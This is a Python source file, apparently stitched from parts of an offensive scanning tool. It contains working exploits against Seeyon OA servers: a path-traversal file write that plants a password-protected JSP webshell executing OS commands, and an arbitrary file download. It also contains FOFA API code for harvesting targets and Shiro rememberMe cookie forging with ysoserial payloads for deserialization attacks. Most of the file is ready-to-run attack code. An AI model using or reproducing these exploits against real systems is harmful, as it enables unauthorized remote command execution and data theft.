async def prove(self):
await self.get_url()
if self.base_url:
table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
test_file = 'test' + str(random.randint(100000, 999999)) + '.txt'
base64_file = str(
base64encode(
'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
test_file), table))
url = self.base_url + 'seeyon/htmlofficeservlet'
async with ClientSession() as session:
async with session.get(url=url) as response:
if response != None:
text = await response.text()
if 'DBSTEP V3.0' in text:
data = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(
base64_file)
async with session.post(url=url,
data=data) as response2:
# print(self.base_url + 'seeyon/' + test_file)
await asyncio.sleep(1)
url1 = self.base_url + 'seeyon/' + test_file
async with session.get(url=url1) as response2:
if response2 != None:
text2 = await response2.text()
if 'this is a test for me' in text2:
self.flag = 1
self.res.append({
"info":
url1,
"key":
'seeyon getshell'
})
async def upload(self):
await self.get_url()
if self.base_url:
table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp'
base64_file = str(
base64encode(
'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
test_file), table))
url = self.base_url + 'seeyon/htmlofficeservlet'
async with ClientSession() as session:
async with session.get(url=url) as response:
if response != None:
text = await response.text()
if 'DBSTEP V3.0' in text:
data = '''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2'''
async with session.post(url=url,
data=data) as response:
await asyncio.sleep(1)
url1 = self.base_url + 'seeyon/' + test_file
async with session.get(url=url1) as response1:
if response1 != None:
text1 = await response1.text()
if ':-)' in text1:
self.flag = 1
self.res.append({
"info":
url1 + '?pwd=test12345&cmd=whoami',
"key":
'seeyon getshell'
})
async def _fofa_api(search, page, flag = True):
'''
https://fofa.so/api#auth
'''
url_login = '******'
try:
email = conf['fofa_api']['email']
key = conf['fofa_api']['token']
except KeyError:
sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
if flag:
logger.sysinfo("Using fofa api...")
search = str(base64encode(search))
async with ClientSession() as session:
for p in range(1,page+1):
logger.debug("Find fofa url of %d page..." % int(p))
async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response:
if response !=None:
if int(response.status) == 401:
sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
else:
res = await response.text()
if res !=None:
res_json = json.loads(res)
if res_json["error"] is None:
if len(res_json.get('results')) == 0:
break
for item in res_json.get('results'):
logger.debug("Fofa Found: %s" % item[0])
yield item[0]
def _fofa_api(search, page, flag = True):
'''
https://fofa.so/api#auth
'''
url_login = '******'
result = []
try:
email = conf['config']['fofa_api']['email']
key = conf['config']['fofa_api']['token']
except KeyError:
sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
if flag:
logger.sysinfo("Using fofa api...")
search = str(base64encode(bytes(search, 'utf-8')),'utf-8')
for p in range(1,page+1):
logger.debug("Find fofa url of %d page..." % int(p))
res = mycurl('post',url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search))
if res !=None :
if int(res.status_code) == 401:
sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
else:
res_json = json.loads( res.text)
if res_json["error"] is None:
for item in res_json.get('results'):
logger.debug("Fofa Found: %s" % item[0])
result.append(item[0])
return result
async def download(self):
await self.get_url()
if self.base_url:
fn = self.parameter['file']
table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
base64_file = str(base64encode(fn, table))
url = self.base_url + 'seeyon/officeservlet'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
async with ClientSession() as session:
async with session.get(url=url) as response:
if response != None:
text = await response.text()
if 'DBSTEP V3.0' in text:
data = '''DBSTEP V3.0 331 0 0 \r\ncurrentUserId=ziCEz4eEz4KuzUK3ziKGwUdszg66\r\nRECORDID=wLKhwLK6\r\nCREATEDATE=wLShwUgsP4o3Pg66\r\noriginalFileId=wV66\r\nneedReadFile=NrMGyV66\r\noriginalCreateDate=wLShwUgsP4o3Pg66\r\nOPTION=LKDxOWOWLlxwVlOW\r\nCOMMAND=BSTLOlMSOCQwOV66\r\nTEMPLATE={}\r\naffairMemberId=wV66\r\naffairMemberName=OKlzLs66'''.format(
base64_file)
async with session.post(
url=url, data=data,
headers=headers) as response:
if response != None:
text = await response.text()
if '<res-type>javax.sql.DataSource</res-type>' in text:
self.flag = 1
self.res.append({
"info":
url,
"key":
'seeyon download'
})
def get_aes_cipher_cookie(self, text, key):
BS = AES.block_size
pad = lambda s: s + (
(BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64decode(key), mode, iv)
file_body = pad(base64decode(text))
base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body))
return "rememberMe=" + str(base64_ciphertext)
def encode_rememberme(self, command, key):
popen = subprocess.Popen([
'java', '-jar', 'tool/ysoserial-0.0.6-SNAPSHOT-all.jar',
'JRMPClient', command
],
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + (
(BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body))
return "rememberMe=" + str(base64_ciphertext)
